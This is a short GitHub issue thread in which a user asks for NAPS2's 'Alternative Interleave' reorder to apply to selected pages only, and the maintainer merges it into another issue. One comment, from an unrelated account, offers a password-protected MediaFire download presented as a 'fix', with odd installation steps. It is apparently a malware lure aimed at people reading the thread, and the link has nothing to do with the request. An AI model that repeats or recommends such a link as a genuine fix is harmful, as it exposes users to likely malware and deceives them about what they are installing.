### ISSUE TITLE
[Reorder->Alternative Interleave] for selected pages

### ISSUE THREAD

**Issue by zwo1a** [cyanfish/naps2#441]
**Is your feature request related to a problem? Please describe.**
When you are scanning duplex documents with a simplex scanner, you can reorder the entire document by using Reorder->Alternative Interleave.
However, when you want to combine multiple duplex documents into a single-sided document, you must first scan the front side of all the documents and then scan the reverse side of all the documents in order.
This is inconvenient because if you are scanning a large number of documents, it is easy to get the order wrong, which will nullify the order. If you need to re-bind the documents after scanning them, you will have to wait until all the reverse sides have been scanned before you can continue.

**Describe the solution you'd like**
Provide an option to sort only the selected pages as in Reorder -> Reverse -> Selected.

**Describe alternatives you've considered**
First save, then merge the documents. But this will consume extra time.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by cyanfish** [comment]
Merging into #303
